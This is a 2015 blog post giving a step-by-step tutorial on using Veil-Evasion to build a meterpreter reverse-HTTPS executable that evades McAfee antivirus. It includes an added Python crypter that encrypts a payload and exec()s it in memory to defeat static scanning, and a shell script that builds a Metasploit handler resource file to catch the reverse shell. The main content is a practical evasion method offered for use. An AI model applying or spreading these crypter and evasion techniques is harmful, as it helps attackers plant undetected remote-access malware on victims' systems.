Tuesday, February 24, 2015
Veil Evasion
This is a post I have been intending to write for several months now; a fellow hacker recently asked me for advice on this topic, so I decided why not share.
Anti-virus can be a real pain for a pentester. However, like everything else in computer security, for every defensive measure there is a more impressive hack. Enter the Veil Framework. Veil as a whole is a very useful framework, but for our purposes we will focus on one component, Veil Evasion. This tool is developed solely for the purpose of bypassing your favorite AV software. I will pick on McAfee, but make no mistake, this is not a flaw in McAfee: the same approach will work on most AVs.
Veil can be installed from its GitHub repository. If you are using Kali it is very simple: run the setup.sh script and you should not hit any major issues. Veil provides a very simple command-line interface. From the first screen, you can use the "list" command to see the payloads that Veil offers. At the time of writing there are 33 payloads to choose from.
Most of my experience has been with payloads 17 and 24; for this discussion I will be using 24, since during my testing I have needed an executable more often than any other payload type. From the list, type "use 24" to select the python meterpreter reverse https payload. Depending on your use case, it is worth noting this is not a staged payload. The following screen has a Metasploit feel to it and is just as simple to use. Use "set" to configure your LHOST and LPORT options. Since we want to create an exe, we leave the "compile_to_exe" option at "Y"; changing it to "N" produces python scripts instead, which is useful for some use cases. Also take note of the "use_pyherion" option, which encrypts your payload. For the first run, leave this as "N"; we will come back to it later. The next screen asks you to name the payload. Once you do, you are presented with three options for how to compile the payload, as shown below.
These options are very important. In a lot of cases the first option works very well, hence it is the default. Let's try option 1 against McAfee. Once you make your selection, Veil compiles your payload and drops it in your home directory under a "veil-output" folder. You will also notice it creates a Metasploit resource file, which is really handy for making sure you set up the correct handler for your payload. With AV there are two kinds of detection that need to be bypassed: static (the file sitting on disk is scanned) and run time (the payload is examined as it executes). I have a Windows 7 64-bit VM with the latest version of McAfee Enterprise. To test static detection I will drop the binary on the system and tell McAfee to scan the file.
Before I can even tell McAfee to scan the file, my payload is detected and deleted. Epic fail. McAfee was even aware that Veil was used to create this payload. Don't worry, not all hope is lost. Remember the two other options I made note of? The first is pyherion, which encrypts your payload. If you rebuild your binary with this option, you will be pleased to find that your payload can be scanned statically without detection. Victory, right? Don't forget the second test. Even though your payload passes static detection in this case, as soon as you run it McAfee throws a fit and removes it. Great, McAfee 2 - Redbutt 0. Let's look at the other compile option, labeled "Pwnstaller (obfuscated Pyinstaller loader)", or option 2. This option also obfuscates the run-time loader used to unpack and run your payload. Let's see how McAfee likes this option. Static test?
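To make the static-versus-run-time distinction concrete, here is an added example (my own code, not Veil's or pyherion's) of the idea behind the use_pyherion option: the payload is encrypted and prefixed with a stub that decrypts and exec()s it in memory. A naive signature scan of the bytes on disk no longer matches, but anything that watches what is actually handed to the interpreter at run time still sees the plaintext. The stager, the "signature" and the SHA-256 counter-mode stream cipher (a stand-in for pyherion's AES) are all constructed for the example.

```python
"""Toy crypter in the spirit of Veil's use_pyherion option (added example,
not Veil code): encrypt the payload, prepend a stub that decrypts and
exec()s it in memory, then compare static and run-time detection."""
import base64
import hashlib
import os
from typing import Optional

# Constructed stand-in for a stager.  A real python/meterpreter/rev_https
# payload would connect back to LHOST:LPORT; this one only records a marker.
PAYLOAD_SRC = "EXECUTED.append('stager: connect https://LHOST:LPORT/')\n"

# Constructed "AV signature": the byte string a naive static scanner keys on.
SIGNATURE = b"connect https://"

# Decryption stub shipped in front of the ciphertext.  The plaintext payload
# only ever exists in memory, after the stub has run.
STUB_TEMPLATE = '''\
import base64, hashlib
def _ks(k, n):
    o, i = b"", 0
    while len(o) < n:
        o += hashlib.sha256(k + i.to_bytes(8, "big")).digest()
        i += 1
    return o[:n]
_k = base64.b64decode("{key}")
_c = base64.b64decode("{blob}")
exec(bytes(a ^ b for a, b in zip(_c, _ks(_k, len(_c)))).decode())
'''


def keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode as a toy stream cipher (NOT AES, not for real use)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]


def encrypt(data: bytes, key: bytes) -> bytes:
    """XOR with the keystream; the same call decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def build_crypted(src: str, key: Optional[bytes] = None) -> str:
    """Return stub + ciphertext, the analogue of a use_pyherion=Y build."""
    key = key or os.urandom(16)
    blob = base64.b64encode(encrypt(src.encode(), key)).decode()
    return STUB_TEMPLATE.format(key=base64.b64encode(key).decode(), blob=blob)


def static_scan(artifact: str) -> bool:
    """Static detection: is the signature present in the bytes on disk?"""
    return SIGNATURE in artifact.encode()


def runtime_scan(artifact: str) -> bool:
    """Run-time detection: execute the artifact with exec() hooked so the
    scanner sees every piece of source handed to the interpreter."""
    seen = [artifact]
    env = {"EXECUTED": []}

    def hooked_exec(src, *args, **kwargs):
        seen.append(src.decode() if isinstance(src, bytes) else src)
        return exec(src, env)          # run it for real, same namespace

    env["exec"] = hooked_exec          # the stub's bare exec() resolves to this
    exec(artifact, env)
    return any(SIGNATURE in s.encode() for s in seen)


def compare(src: str = PAYLOAD_SRC) -> dict:
    """(static_detected, runtime_detected) for the plain and crypted builds."""
    crypted = build_crypted(src)
    return {
        "plain": (static_scan(src), runtime_scan(src)),
        "crypted": (static_scan(crypted), runtime_scan(crypted)),
    }


if __name__ == "__main__":
    for name, (static, runtime) in compare().items():
        verdict = lambda hit: "DETECTED" if hit else "clean"
        print(f"{name:8s} static={verdict(static)} runtime={verdict(runtime)}")
```

The plain build is caught by both scans; the crypted build passes the static scan and is still caught at run time, which is exactly the McAfee 2 - 0 score above. Pwnstaller attacks the remaining half of the problem by changing the loader that unpacks and runs the payload, not just the payload bytes.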
Sweet, first test passed! Now let's try to run it.
No alarms! Did we get a meterpreter session?
Success! What is even better about this option is that you do not need pyherion as well; this compile option takes care of both static and run-time detection IN THIS INSTANCE. It is important to note that this does not mean it will work for every AV or every version; each AV should be tested independently. You can also hand your Veil payload to Metasploit modules that build their own executable using the advanced "set EXE::Custom \path\to\veil.exe" option. That's Veil Evasion in a nutshell with a basic scenario. Feel free to comment or message me with questions or other experiences.
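Since a mismatched handler is the usual reason a clean payload never calls back, here is an added example (mine, not the resource file Veil itself writes) of a shell helper that builds the multi/handler resource file for this payload and checks that it carries the same LHOST and LPORT you set in Veil. The handler payload name python/meterpreter/reverse_https is my assumption of what the Veil-generated file sets for payload 24; the IP and port in the usage are placeholders.

```shell
#!/bin/sh
# Added example (not Veil's own resource file): write a multi/handler
# resource file for a Veil python/meterpreter/rev_https build and verify
# that it matches the values compiled into the exe.

write_handler_rc() {
    lhost="$1"; lport="$2"; out="$3"
    # Refuse a non-numeric port before msfconsole ever sees it.
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric: '$lport'" >&2; return 1 ;;
    esac
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_https
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# Pre-flight check: the handler must carry the same LHOST/LPORT that were
# set in Veil, or the callback from the target never lands.
check_handler_rc() {
    rc="$1"; lhost="$2"; lport="$3"
    grep -qxF "set LHOST $lhost" "$rc" && grep -qxF "set LPORT $lport" "$rc"
}

# Usage (placeholders): build the file, confirm it, then start the listener.
#   write_handler_rc 192.168.56.101 443 veil_handler.rc
#   check_handler_rc veil_handler.rc 192.168.56.101 443 && msfconsole -r veil_handler.rc
```

For a module that builds its own executable, adding "set EXE::Custom /path/to/veil.exe" to the same resource file swaps the Veil binary in for the one Metasploit would otherwise generate.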